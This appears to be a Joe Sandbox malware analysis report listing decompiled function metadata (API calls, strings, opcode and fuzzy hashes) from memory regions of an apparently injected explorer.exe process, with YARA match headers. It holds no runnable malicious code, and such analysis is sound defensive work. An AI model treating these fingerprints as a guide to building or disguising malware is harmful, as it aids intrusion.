                                                                                                                                                                    • Part of subcall function 033417AC: _amsg_exit.LIBCMT ref: 033417C2
                                                                                                                                                                  • _getptd.LIBCMT ref: 03343911
                                                                                                                                                                  • _getptd.LIBCMT ref: 0334391D
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.3382324797.0000000003320000.00000020.00000001.00020000.00000000.sdmp, Offset: 03320000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_3320000_explorer.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _getptd$DestructExceptionObject$_amsg_exit_getptd_noexit
                                                                                                                                                                  • String ID: csm
                                                                                                                                                                  • API String ID: 331613561-1018135373
                                                                                                                                                                  • Opcode ID: 5e84bfd2dc6374b3e8ed0f893bd8a07073a9945c7d24500524e6b3446befad47
                                                                                                                                                                  • Instruction ID: 291422d394174516a76cc4162c56e057022950ea080b45b94cc57beb8ad60b10
                                                                                                                                                                  • Opcode Fuzzy Hash: 5e84bfd2dc6374b3e8ed0f893bd8a07073a9945c7d24500524e6b3446befad47
                                                                                                                                                                  • Instruction Fuzzy Hash: EA213E3A60478486DB30DF16E48035EBBA1F789BA5F444216DF9917B54DF39E586CB00
                                                                                                                                                                  APIs
                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0332C3B9
                                                                                                                                                                    • Part of subcall function 0333B790: _lock.LIBCMT ref: 0333B7A2
                                                                                                                                                                    • Part of subcall function 0332DB40: std::_Lockit::_Lockit.LIBCPMT ref: 0332DB56
                                                                                                                                                                    • Part of subcall function 0332DB40: std::_Lockit::~_Lockit.LIBCPMT ref: 0332DB79
                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 0332C41E
                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0332C428
                                                                                                                                                                  • std::bad_exception::bad_exception.LIBCMT ref: 0332C44C
                                                                                                                                                                  • _CxxThrowException.LIBCMT ref: 0332C45D
                                                                                                                                                                  Strings
                                                                                                                                                                  • : The expression contained mismatched [ and ]., xrefs: 0332C440
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.3382324797.0000000003320000.00000020.00000001.00020000.00000000.sdmp, Offset: 03320000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_3320000_explorer.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrow_lockstd::bad_exception::bad_exception
                                                                                                                                                                  • String ID: : The expression contained mismatched [ and ].
                                                                                                                                                                  • API String ID: 885392049-2484396094
                                                                                                                                                                  • Opcode ID: 8dc41d5dbb65d61d7cc90533f1c3d6d8eef9333a717630de676929cf2e46a118
                                                                                                                                                                  • Instruction ID: d6eb7c1f0717a60dfec7fe1524559ecd10c19cc497bf19732ad7fe0c2a092775
                                                                                                                                                                  • Opcode Fuzzy Hash: 8dc41d5dbb65d61d7cc90533f1c3d6d8eef9333a717630de676929cf2e46a118
                                                                                                                                                                  • Instruction Fuzzy Hash: 3C119136B04B4491DE11DB16E8D036EE765F789BE4F8882219AAD4BBA8DF7CC245C700
                                                                                                                                                                  APIs
                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0332C2E9
                                                                                                                                                                    • Part of subcall function 0333B790: _lock.LIBCMT ref: 0333B7A2
                                                                                                                                                                    • Part of subcall function 0332DB40: std::_Lockit::_Lockit.LIBCPMT ref: 0332DB56
                                                                                                                                                                    • Part of subcall function 0332DB40: std::_Lockit::~_Lockit.LIBCPMT ref: 0332DB79
                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 0332C34E
                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0332C358
                                                                                                                                                                  • std::bad_exception::bad_exception.LIBCMT ref: 0332C37C
                                                                                                                                                                  • _CxxThrowException.LIBCMT ref: 0332C38D
                                                                                                                                                                  Strings
                                                                                                                                                                  • : The expression contained mismatched [ and ]., xrefs: 0332C370
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.3382324797.0000000003320000.00000020.00000001.00020000.00000000.sdmp, Offset: 03320000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_3320000_explorer.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrow_lockstd::bad_exception::bad_exception
                                                                                                                                                                  • String ID: : The expression contained mismatched [ and ].
                                                                                                                                                                  • API String ID: 885392049-2484396094
                                                                                                                                                                  • Opcode ID: f7786013f5cd33757e87bfec871b2f1cb24b3109d5a916a062dc856c4de14913
                                                                                                                                                                  • Instruction ID: a3663b0003a19569a89b67cfa8746034befd984991e0acf2afcae240f73b8d0a
                                                                                                                                                                  • Opcode Fuzzy Hash: f7786013f5cd33757e87bfec871b2f1cb24b3109d5a916a062dc856c4de14913
                                                                                                                                                                  • Instruction Fuzzy Hash: F5119435704B4491DE05DB22F4D035DE365F789BE0F4882219A9D4BBA8DF7CC646C700
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.3382324797.0000000003320000.00000020.00000001.00020000.00000000.sdmp, Offset: 03320000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_3320000_explorer.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _getptd
                                                                                                                                                                  • String ID: MOC$RCC$csm
                                                                                                                                                                  • API String ID: 3186804695-2671469338
                                                                                                                                                                  • Opcode ID: 7997cc07de5a0b9fe1d06e3a3cd088aa0d5137e088e48fbd6215a328365de7e6
                                                                                                                                                                  • Instruction ID: b5941283da970cbabcdc0fb4b360dfa1193aa290d5132c42fd197e9919cd8c9f
                                                                                                                                                                  • Opcode Fuzzy Hash: 7997cc07de5a0b9fe1d06e3a3cd088aa0d5137e088e48fbd6215a328365de7e6
                                                                                                                                                                  • Instruction Fuzzy Hash: 42E0123ED10245D6C769EB6585C43AD3AE0FBD8725F8AD56586144B300C7BDA5E08E12
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_9820000_explorer.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _getptd
                                                                                                                                                                  • String ID: MOC$RCC$csm
                                                                                                                                                                  • API String ID: 3186804695-2671469338
                                                                                                                                                                  • Opcode ID: 7997cc07de5a0b9fe1d06e3a3cd088aa0d5137e088e48fbd6215a328365de7e6
                                                                                                                                                                  • Instruction ID: 05308f09187e746adafb077c42ee10e474e18ee8530d9ad830798e0b1c96e890
                                                                                                                                                                  • Opcode Fuzzy Hash: 7997cc07de5a0b9fe1d06e3a3cd088aa0d5137e088e48fbd6215a328365de7e6
                                                                                                                                                                  • Instruction Fuzzy Hash: 33E06D7650420CC6CB256B7884043AC36F0EFA8B19F97E4BDA620C2360C7BC44908A13
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_9820000_explorer.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: isdigit
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2326231117-0
                                                                                                                                                                  • Opcode ID: 06d4147f36d1048e68fff4854dd20f832a27fc448c1145862ed6e7d68071b082
                                                                                                                                                                  • Instruction ID: a0cd57d51a69f7faf98b77395c308513ac50b1de7934b8fe303c7824eeb772ea
                                                                                                                                                                  • Opcode Fuzzy Hash: 06d4147f36d1048e68fff4854dd20f832a27fc448c1145862ed6e7d68071b082
                                                                                                                                                                  • Instruction Fuzzy Hash: 9B21C520A45A7186EB30DF71E8D6B3A23D8A720F95F00401EE543C6B75EB1DC0D48769
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_9820000_explorer.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: lstrcatlstrlen$lstrcpymalloc
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3932841890-0
                                                                                                                                                                  • Opcode ID: 26f3c2fe96ec8b53ba7d873d714c4c0d1bcf5c705161d735941e7bf04a66f02f
                                                                                                                                                                  • Instruction ID: 00baba20af85e3bcafc0af8e44019a6c5786a48a69b542e4cef08d7465f5734b
                                                                                                                                                                  • Opcode Fuzzy Hash: 26f3c2fe96ec8b53ba7d873d714c4c0d1bcf5c705161d735941e7bf04a66f02f
                                                                                                                                                                  • Instruction Fuzzy Hash: 02016D21704B4582EF589F67B95872A6361EF9AFC0F48D4359D4F4BB1ADE3CC0858700
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_9820000_explorer.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Pointerabort$DecodeEncode_set_abort_behavior
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2556904055-0
                                                                                                                                                                  • Opcode ID: 4eee50fa0f7e27dce3ca1ba23277c15061aad6adf7266d05848666a1cff57a75
                                                                                                                                                                  • Instruction ID: 2083471d559799acbf6f04cff89456ec23200bd41891cf7533b538ec578b3ebb
                                                                                                                                                                  • Opcode Fuzzy Hash: 4eee50fa0f7e27dce3ca1ba23277c15061aad6adf7266d05848666a1cff57a75
                                                                                                                                                                  • Instruction Fuzzy Hash: BCF08C28602F0C81EE486F68EC643193320FF8AB02F85DC1DCA4EA7762DE3C91598702
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.3382324797.0000000003320000.00000020.00000001.00020000.00000000.sdmp, Offset: 03320000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_3320000_explorer.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: free$CompareString__crtmalloc
                                                                                                                                                                  • String ID: p
                                                                                                                                                                  • API String ID: 1736151240-2181537457
                                                                                                                                                                  • Opcode ID: 73e5a8a52c0a39e0188a483ffdf8b6321454de3d3f57362cdf5020de639b8068
                                                                                                                                                                  • Instruction ID: fabd42617576c3ed778280aeb1d616b8566608b62722eb69c0edd768c66ce746
                                                                                                                                                                  • Opcode Fuzzy Hash: 73e5a8a52c0a39e0188a483ffdf8b6321454de3d3f57362cdf5020de639b8068
                                                                                                                                                                  • Instruction Fuzzy Hash: AB31D172B0474186DB21DF1AE9807A9B795F786BA8F988712DA1D47B94DB7CC145C300
                                                                                                                                                                  APIs
                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0982CFB9
                                                                                                                                                                    • Part of subcall function 0983C390: _lock.LIBCMT ref: 0983C3A2
                                                                                                                                                                    • Part of subcall function 0982E740: std::_Lockit::_Lockit.LIBCPMT ref: 0982E756
                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 0982D01E
                                                                                                                                                                  • std::bad_exception::bad_exception.LIBCMT ref: 0982D04C
                                                                                                                                                                  • _CxxThrowException.LIBCMT ref: 0982D05D
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_9820000_explorer.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockstd::bad_exception::bad_exception
                                                                                                                                                                  • String ID: bad cast
                                                                                                                                                                  • API String ID: 1776536810-3145022300
                                                                                                                                                                  • Opcode ID: c1b9892ce7d6fabe14467b7f8ac8b0f2f6d38a035db2db810570c5f17772f7fb
                                                                                                                                                                  • Instruction ID: 7148febcce059137f0fee60200124d775b980766f10745a9975bc36494379ea5
                                                                                                                                                                  • Opcode Fuzzy Hash: c1b9892ce7d6fabe14467b7f8ac8b0f2f6d38a035db2db810570c5f17772f7fb
                                                                                                                                                                  • Instruction Fuzzy Hash: D9119431304B4481DE10DB26E454359A361F7C9BE4F88C22999DD97BA9DF7CC146C741
                                                                                                                                                                  APIs
                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0982CEE9
                                                                                                                                                                    • Part of subcall function 0983C390: _lock.LIBCMT ref: 0983C3A2
                                                                                                                                                                    • Part of subcall function 0982E740: std::_Lockit::_Lockit.LIBCPMT ref: 0982E756
                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 0982CF4E
                                                                                                                                                                  • std::bad_exception::bad_exception.LIBCMT ref: 0982CF7C
                                                                                                                                                                  • _CxxThrowException.LIBCMT ref: 0982CF8D
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_9820000_explorer.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockstd::bad_exception::bad_exception
                                                                                                                                                                  • String ID: bad cast
                                                                                                                                                                  • API String ID: 1776536810-3145022300
                                                                                                                                                                  • Opcode ID: 2c293c4bd445611631076043477384d2d0f414fc123820659eb49069db396af7
                                                                                                                                                                  • Instruction ID: 6eb8f07cc727eafb1d491b5a525c31dbe0eb2d09184b330d81874577837eb260
                                                                                                                                                                  • Opcode Fuzzy Hash: 2c293c4bd445611631076043477384d2d0f414fc123820659eb49069db396af7
                                                                                                                                                                  • Instruction Fuzzy Hash: 53115832304B5091DE00DB25E44436DB361F7C5BE4F88D2299A9D97BA9DF7CC54AC741
                                                                                                                                                                  APIs
                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0332CDF2
                                                                                                                                                                    • Part of subcall function 0333B790: _lock.LIBCMT ref: 0333B7A2
                                                                                                                                                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0332CE38
                                                                                                                                                                    • Part of subcall function 0333BF6C: setlocale.LIBCMT ref: 0333BF80
                                                                                                                                                                    • Part of subcall function 0333BF6C: _Yarn.LIBCPMT ref: 0333BF9A
                                                                                                                                                                    • Part of subcall function 0333BF6C: setlocale.LIBCMT ref: 0333BFA9
                                                                                                                                                                  • std::bad_exception::bad_exception.LIBCMT ref: 0332CE57
                                                                                                                                                                  • _CxxThrowException.LIBCMT ref: 0332CE68
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.3382324797.0000000003320000.00000020.00000001.00020000.00000000.sdmp, Offset: 03320000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_3320000_explorer.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: setlocalestd::_$ExceptionLocinfo::_Locinfo_ctorLockitLockit::_ThrowYarn_lockstd::bad_exception::bad_exception
                                                                                                                                                                  • String ID: url_blacklist
                                                                                                                                                                  • API String ID: 1861546320-2937129071
                                                                                                                                                                  • Opcode ID: 5c355203c424fcdde38b676968eb1ad36987fc9aa9b9f6ef8ed236e096919255
                                                                                                                                                                  • Instruction ID: 5d9895edde1870bb8f99051d213ce3962ea95dd8f232a7e199d59241bb81d815
                                                                                                                                                                  • Opcode Fuzzy Hash: 5c355203c424fcdde38b676968eb1ad36987fc9aa9b9f6ef8ed236e096919255
                                                                                                                                                                  • Instruction Fuzzy Hash: FEF01277A10E5550CB54EF26D9D015CE725EB98B84FC4B021965E4F568EF24CA45C390
                                                                                                                                                                  APIs
                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0982D9F2
                                                                                                                                                                    • Part of subcall function 0983C390: _lock.LIBCMT ref: 0983C3A2
                                                                                                                                                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0982DA38
                                                                                                                                                                    • Part of subcall function 0983CB6C: setlocale.LIBCMT ref: 0983CB80
                                                                                                                                                                    • Part of subcall function 0983CB6C: _Yarn.LIBCPMT ref: 0983CB9A
                                                                                                                                                                    • Part of subcall function 0983CB6C: setlocale.LIBCMT ref: 0983CBA9
                                                                                                                                                                  • std::bad_exception::bad_exception.LIBCMT ref: 0982DA57
                                                                                                                                                                  • _CxxThrowException.LIBCMT ref: 0982DA68
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_9820000_explorer.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: setlocalestd::_$ExceptionLocinfo::_Locinfo_ctorLockitLockit::_ThrowYarn_lockstd::bad_exception::bad_exception
                                                                                                                                                                  • String ID: bad locale name
                                                                                                                                                                  • API String ID: 1861546320-1405518554
                                                                                                                                                                  • Opcode ID: 0b99a4e70dfc6c7fe37576a9850908aef64fdc5d550c1a7abe3e2b5dc80e7d22
                                                                                                                                                                  • Instruction ID: 327d56240d397c4f9c25d73f1703b3c525aea9f863df749ff9e2915a156f09e0
                                                                                                                                                                  • Opcode Fuzzy Hash: 0b99a4e70dfc6c7fe37576a9850908aef64fdc5d550c1a7abe3e2b5dc80e7d22
                                                                                                                                                                  • Instruction Fuzzy Hash: 41F0A262210D1150CB00FF2CD95039C6725EF98B88FD4E0298A4EC7BA8FE74C986C382
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_9820000_explorer.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::__errno_isleadbyte_l
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2998201375-0
                                                                                                                                                                  • Opcode ID: 9bf59e59e5c08a92196a8eecb1bdc593485ce24b2fd89f1deead426ddc14eaea
                                                                                                                                                                  • Instruction ID: 3cffe9443a4af92ab081e91e7273fae22c48b67df80599d8983677ac86945146
                                                                                                                                                                  • Opcode Fuzzy Hash: 9bf59e59e5c08a92196a8eecb1bdc593485ce24b2fd89f1deead426ddc14eaea
                                                                                                                                                                  • Instruction Fuzzy Hash: 6531D67221478487DB209F25E940329BB65FF95FC4F18812AEF89D7B99DB38D441C700
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_9820000_explorer.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Module32$Next$CreateCurrentFirstProcessSnapshotToolhelp32
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3721439000-0
                                                                                                                                                                  • Opcode ID: add457e1e98920d2760c7c05102d119e105337da01049b787e53bb3b1fde5219
                                                                                                                                                                  • Instruction ID: e9ad1548ba66c1950e5311bb34e9b465fd77174d11f325cb6e9dda17d002d5b2
                                                                                                                                                                  • Opcode Fuzzy Hash: add457e1e98920d2760c7c05102d119e105337da01049b787e53bb3b1fde5219
                                                                                                                                                                  • Instruction Fuzzy Hash: 4D119322218644A2DA24DF29E59036A7365FBC93D4FD0E215DA9DC7798DF2CC509CB41
                                                                                                                                                                  APIs
                                                                                                                                                                  • _getptd.LIBCMT ref: 0333D081
                                                                                                                                                                    • Part of subcall function 033417AC: _getptd_noexit.LIBCMT ref: 033417B2
                                                                                                                                                                    • Part of subcall function 033417AC: _amsg_exit.LIBCMT ref: 033417C2
                                                                                                                                                                  • _inconsistency.LIBCMT ref: 0333D08F
                                                                                                                                                                  • _getptd.LIBCMT ref: 0333D094
                                                                                                                                                                  • _inconsistency.LIBCMT ref: 0333D0B0
                                                                                                                                                                  • _getptd.LIBCMT ref: 0333D0C0
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.3382324797.0000000003320000.00000020.00000001.00020000.00000000.sdmp, Offset: 03320000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_3320000_explorer.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _getptd$_inconsistency$_amsg_exit_getptd_noexit
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 823043651-0
                                                                                                                                                                  • Opcode ID: a59402f6edba0345271037812e36e693c9b41085103b3a28d7fde40256890806
                                                                                                                                                                  • Instruction ID: ee408f09fa7c2ea09e893c1822d21430de90259f4d8056eadc3c3ef0fd7ab682
                                                                                                                                                                  • Opcode Fuzzy Hash: a59402f6edba0345271037812e36e693c9b41085103b3a28d7fde40256890806
                                                                                                                                                                  • Instruction Fuzzy Hash: 6DE0392AA14B8190CA21EB61E2C02EDAAA4EB89F94F0CC171AB440F609DE28D4A18355
                                                                                                                                                                  APIs
                                                                                                                                                                  • _getptd.LIBCMT ref: 0983DC81
                                                                                                                                                                    • Part of subcall function 098423AC: _getptd_noexit.LIBCMT ref: 098423B2
                                                                                                                                                                    • Part of subcall function 098423AC: _amsg_exit.LIBCMT ref: 098423C2
                                                                                                                                                                  • _inconsistency.LIBCMT ref: 0983DC8F
                                                                                                                                                                    • Part of subcall function 09844BB0: DecodePointer.KERNEL32 ref: 09844BBB
                                                                                                                                                                  • _getptd.LIBCMT ref: 0983DC94
                                                                                                                                                                  • _inconsistency.LIBCMT ref: 0983DCB0
                                                                                                                                                                  • _getptd.LIBCMT ref: 0983DCC0
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_9820000_explorer.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _getptd$_inconsistency$DecodePointer_amsg_exit_getptd_noexit
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3669027769-0
                                                                                                                                                                  • Opcode ID: a59402f6edba0345271037812e36e693c9b41085103b3a28d7fde40256890806
                                                                                                                                                                  • Instruction ID: 151a54d04a75c2b0abc8776bbd6197614594da872e5206adbf29c48f23ce3826
                                                                                                                                                                  • Opcode Fuzzy Hash: a59402f6edba0345271037812e36e693c9b41085103b3a28d7fde40256890806
                                                                                                                                                                  • Instruction Fuzzy Hash: C3E06532224688C0CA21BF75E0403BD63A0EF98F94F4CE47DEB5487755DE64C4A18796
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0333D074: _getptd.LIBCMT ref: 0333D081
                                                                                                                                                                    • Part of subcall function 0333D074: _inconsistency.LIBCMT ref: 0333D08F
                                                                                                                                                                    • Part of subcall function 0333D074: _getptd.LIBCMT ref: 0333D094
                                                                                                                                                                    • Part of subcall function 0333D074: _inconsistency.LIBCMT ref: 0333D0B0
                                                                                                                                                                  • __DestructExceptionObject.LIBCMT ref: 0334E48B
                                                                                                                                                                  • _getptd.LIBCMT ref: 0334E491
                                                                                                                                                                  • _getptd.LIBCMT ref: 0334E4A4
                                                                                                                                                                    • Part of subcall function 0333D104: _getptd.LIBCMT ref: 0333D10D
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.3382324797.0000000003320000.00000020.00000001.00020000.00000000.sdmp, Offset: 03320000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_3320000_explorer.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _getptd$_inconsistency$DestructExceptionObject
                                                                                                                                                                  • String ID: csm
                                                                                                                                                                  • API String ID: 2821275340-1018135373
                                                                                                                                                                  • Opcode ID: 3d3c92d82db18198882214c5651a9633e7408605bbfd0fafc6450b131983cc71
                                                                                                                                                                  • Instruction ID: 00b74c7600b39b77c84247be6215f5fefe25924412cc36a816741407d6621367
                                                                                                                                                                  • Opcode Fuzzy Hash: 3d3c92d82db18198882214c5651a9633e7408605bbfd0fafc6450b131983cc71
                                                                                                                                                                  • Instruction Fuzzy Hash: 13F03C2AA4064189CB20EF31E8C02AC2BA4F785B99F4A5661DE895E704DE24D4C5C740
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0983DC74: _getptd.LIBCMT ref: 0983DC81
                                                                                                                                                                    • Part of subcall function 0983DC74: _inconsistency.LIBCMT ref: 0983DC8F
                                                                                                                                                                    • Part of subcall function 0983DC74: _getptd.LIBCMT ref: 0983DC94
                                                                                                                                                                    • Part of subcall function 0983DC74: _inconsistency.LIBCMT ref: 0983DCB0
                                                                                                                                                                  • __DestructExceptionObject.LIBCMT ref: 0984F08B
                                                                                                                                                                  • _getptd.LIBCMT ref: 0984F091
                                                                                                                                                                  • _getptd.LIBCMT ref: 0984F0A4
                                                                                                                                                                    • Part of subcall function 0983DD04: _getptd.LIBCMT ref: 0983DD0D
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_9820000_explorer.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _getptd$_inconsistency$DestructExceptionObject
                                                                                                                                                                  • String ID: csm
                                                                                                                                                                  • API String ID: 2821275340-1018135373
                                                                                                                                                                  • Opcode ID: 3d3c92d82db18198882214c5651a9633e7408605bbfd0fafc6450b131983cc71
                                                                                                                                                                  • Instruction ID: 133e52f8a20a3f59db29fc9fa59e97d5fe299633a1db51cd16d194bbfb64c411
                                                                                                                                                                  • Opcode Fuzzy Hash: 3d3c92d82db18198882214c5651a9633e7408605bbfd0fafc6450b131983cc71
                                                                                                                                                                  • Instruction Fuzzy Hash: 9DF037722406498ACB20AF35D8817AC3364EFD5B99F48A93DEE89CA705EF21C4C1C742
                                                                                                                                                                  APIs
                                                                                                                                                                  • _callnewh.LIBCMT ref: 0333C19E
                                                                                                                                                                  • malloc.LIBCMT ref: 0333C1AA
                                                                                                                                                                    • Part of subcall function 0333CB0C: _FF_MSGBANNER.LIBCMT ref: 0333CB3C
                                                                                                                                                                    • Part of subcall function 0333CB0C: _NMSG_WRITE.LIBCMT ref: 0333CB46
                                                                                                                                                                    • Part of subcall function 0333CB0C: _callnewh.LIBCMT ref: 0333CB7A
                                                                                                                                                                    • Part of subcall function 0333CB0C: _errno.LIBCMT ref: 0333CB85
                                                                                                                                                                    • Part of subcall function 0333CB0C: _errno.LIBCMT ref: 0333CB90
                                                                                                                                                                  • _CxxThrowException.LIBCMT ref: 0333C1F3
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.3382324797.0000000003320000.00000020.00000001.00020000.00000000.sdmp, Offset: 03320000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
